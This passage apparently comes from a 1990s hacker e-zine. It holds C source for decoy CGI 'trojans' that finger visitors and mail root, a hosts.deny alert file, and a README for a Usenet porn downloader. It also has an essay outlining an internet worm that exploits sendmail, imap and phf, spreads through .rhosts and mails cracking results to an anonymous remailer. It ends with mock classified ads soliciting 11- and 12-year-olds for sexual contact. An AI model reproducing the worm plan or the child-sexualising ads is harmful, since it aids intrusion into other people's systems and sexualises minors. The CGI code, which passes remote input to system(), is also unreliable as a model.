--==+*~Shok~+*-- */ /* --------------------------------------------------- */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> void main(void) { FILE *tmpfile, *fingerinfo; char *host *addr, *browser, *query_string; char fingerbuf[2048]; host=getenv("REMOTE_HOST"); addr=getenv("REMOTE_ADDR"); browser=getenv("HTTP_USER_AGENT"); query_string=getenv("QUERY_STRING"); /* This is to prevent a finger war, for safety, even though you SHOULD */ /* have in.fingerd: LOCAL in your hosts.allow */ if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0); system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo"); tmpfile=fopen("/var/tmp/.test-cgi", "w"); fprintf(tmpfile, "The following person used phf:\n\n"); fprintf(tmpfile, "\tHost: %s\n", host); fprintf(tmpfile, "\tAddress: %s\n", addr); fprintf(tmpfile, "\tBrowser type: %s\n ", browser); fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string); fingerinfo=fopen("/var/tmp/.fingerinfo", "r"); fgets(fingerbuf, 2047, fingerinfo); fclose(fingerinfo); fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n"); fprintf(tmpfile, "--------------------------------------------------\n"); fputs(fingerbuf, tmpfile); fclose(tmpfile); /* REPLACE THIS PART WITH WHO YOU WANT TO MAIL IT TO change the root to */ /* to whatever you want */ system("mail -s \"SOMEONE USED test-cgi!!\" root < /var/tmp/.test-cgi"); unlink("/var/tmp/.fingerinfo"); unlink("/var/tmp/.test-cgi"); printf("Content-type: text/html\n\n"); printf("<h2>File Not found\n</h2>"); printf("The requested URL /cgi-bin/test-cgi was not found on this server."); } Just as an added bonus here......... When someone goes to a directory you have .htaccess in, it will send 401, which is the unauthorized error code (pretty sure it's 401 but not in the mood to check). Now I editted my srm.conf (usually /usr/local/etc/httpd/conf/srm.conf), and added this line: ErrorDocument 401 /cgi-bin/unauthorized.cgi This is basically like the one above.......except it differs by the the 'user' part, which lets you know what user it was...this is a good way to know if there is an unauthorized attempt, and/or what user is logging into your webpage that is secured...... unauthorized.c: /* -------------------------------------------------------- */ /* Unauthorized cgi "trojan" script by (--==+*~Shok~*+==--) */ /* -------------------------------------------------------- */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> void main(void) { FILE *tmpfile, *fingerinfo; char *host, *addr, *user, *ident, *browser, *query_string; char fingerbuf[2048]; host=getenv("REMOTE_HOST"); addr=getenv("REMOTE_ADDR"); user=getenv("REMOTE_USER"); ident=getenv("REMOTE_IDENT"); browser=getenv("HTTP_USER_AGENT"); query_string=getenv("QUERY_STRING"); /* This can get ugly */ if ((strcmp(addr, "206.71.69.243"))==0) exit(0); system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo"); tmpfile=fopen("/var/tmp/.unauthorized", "w"); fprintf(tmpfile, "The following person has unauthorized access:\n\n"); fprintf(tmpfile, "\tHost: %s\n", host); fprintf(tmpfile, "\tAddress: %s\n", addr); fprintf(tmpfile, "\tUser (if able): %s\n", user); fprintf(tmpfile, "\tIdent (if able): %s\n", ident); fprintf(tmpfile, "\tBrowser type: %s\n ", browser); fingerinfo=fopen("/var/tmp/.fingerinfo", "r"); fgets(fingerbuf, 2047, fingerinfo); fclose(fingerinfo); fprintf(tmpfile, "I did a finger of the person:\n"); fprintf(tmpfile, "-----------------------------\n"); fputs(fingerbuf, tmpfile); fclose(tmpfile); system("mail -s \"Somone tried unauthorized access\" root </var/tmp/.unauthorized"); unlink("/var/tmp/.fingerinfo"); unlink("/var/tmp/.unauthorized"); printf("Content-type: text/html\n\n"); printf("<HEAD><TITLE>Unauthorized</TITLE></HEAD>"); printf("<BODY><H1>Unauthorized</H1>"); printf("You are unauthorized and unwanted here.\n Go away <FONT COLOR=\"red\">d0rk</FONT><P>"); printf("</BODY>"); } Here is my hosts.deny too.........in case you wanted to see it ;) ALL: .cc.edu: /bin/mail -s "%h from CC.EDU tried to access us!!" root ALL: .gov, .mil: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "GOV/MIL ATTEMPTED ACCESS from %h!! Using %s." root & in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root #FINGER - Noisy people #------------ in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root & #Security reasons #--------------- in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root & in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root & #in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root & # PORTMAP #------------- portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root & #COMSAT in.comsat: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root & #REXECD in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root & #RSHD in.rshd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root & #NNRPD in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root & #RPCBIND rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root & #ALL: paranoid Well.......................................we're winding down to the end. It has been fun and I don't have much more to say on this article. Thanks for reading, please feel free to use and distribute this, although I wish for you to leave my comments and "header" at the tops ... ya know my "copyright" :) You can access a few of my things at ftp.janova.org (in pub) or www.janova.org. Shok (--==+*~Shok~*+==--) Email: shok@sekurity.org ─────────────────────────────────────────────────────────────────────────────── 3. PornBot : TFreak ─────────────────────────────────────────────────────────────────────────────── Pornbot v1.0 by TFreak [08/18/97] Overview -------- Pornbot is a config file driven all purpose newsbot for UNIX. It scans the newsgroups found in the config file (pornbot.conf) for encoded binaries and saves the decoded image to disk. Getting Started --------------- 1) Edit the UUDECODEPATH variable on line 24 of the source file to point to its location on your system. If you don't have one, a Linux binary is included with this release. (however, we rm'd the zgv with this release, becuase its too fucking big, so copy zgv to the pornbot dir -- so1o) 2) Edit the pornbot.conf file. The first entry is an NNTP server to which you have read permission on. The remaining lines are newsgroups in which you want pornbot to scan. The config file is terminated with a $ on a blank line. ``#'' comments out a line, and blank lines are ignored. NOTE: For memory conservation purposes, the MAXNEWSGROUPS variable is included. If you plan on scanning a lot of newsgroups, up this number (default is 15 newsgroups). If you have more newsgroups than whats compiled in, anything after that max will be ignored. 3) Compile your binary. cc -o pornbot pornbot.c This should compile fine. Tested on Linux and FreeBSD. After this your ready to start downloading! -tf ─────────────────────────────────────────────────────────────────────────────── 4. Crypto Worm (philsophy) ─────────────────────────────────────────────────────────────────────────────── Worm for Crypto! (philosophy) ----------------------------- By: --==+(*Shok*)+==-- Well that may of gotten your attention :) Something I realized when going through some crypto related articles. Consider the following.....you want to crack rsa, but you know that the MIPS years required is far too great. Well what if you were, to write an internet worm, that would exploit system holes, like sendmail, imap, popd, httpd (brute force), phf, any thing it could to get into the system, and once it was in, it ran a program for cryptographic related purposes. You could use this to crack a key or an encryption standard like RSA. It could then mail it's output to an anonymous server or a news group or somewhere to obtain your anonymity. But this way, you could be using machines all over the world to crack something. Now this article is more of a philsopy than anything, I am just explain this. But think about it.....it could be useful eh? Here is what it could do: 1.) You could use something like srand() with the date as a seed (or just take the code out of an ip scanner, eipscan for example, is a nice one), and have it find hosts that way. Also you could use a dns scanner at the same time.......no matter however you want to go about it. 2.) Try to exploit this host while still scanning for more hosts in the parent. 2.) Exploit (get into) the host. 3.) Get information from /etc/hosts, .rhosts, etc. and repeat step two on those hosts (fork another process). 4.) Have your program, output to a file your code for cracking, and compile that on the system (you chould put this in the code of the worm but I don't think it would be as neat...it'd be too messy. 5.) After running mail the results to something like anon.pinet.fi (or whatever it was...) you get the idea. You might want it to only mail if certain conditions occur such as it cracks it or anything. You'd also want to randomly try to crack the key, and not a sequence, because otherwise, you'd be the whole point, and all the hosts would be doing the same thing, so all you'd need is the quickest one, and you certainly don't want that! :) This is just a philosopy I'm not including any code on this one....too much code and not enough time ;) --==+*~(Shok)~*+==-- ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── --------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters. ADZ@CODEZ.COM | Call Anytime : (816)781-8009 | (Ask for Tommy) | --------------------------------------+--------------------------------------- | ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@ | Looking for men 11 - 12 for adult | Yeah huney, you know you want me, video satisfaction. I am 35 into | I'll treat you just right, I'm Professional wrestling. | waiting for your call today! Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154 | (Ask for Kim) --------------------------------------+--------------------------------------- ─────────────────────────────────────────────────────────────────────────────── .oO Team CodeZero Oo. ─────────────────────────────────────────────────────────────────────────────── _ /| k0dekat sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR SKiLLz, U nOt CaTf00d!!#@" ─────────────────────────────────────────────────────────────────────────────── Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* ─────────────────────────────────────────────────────────────────────────────── <-- line 2500.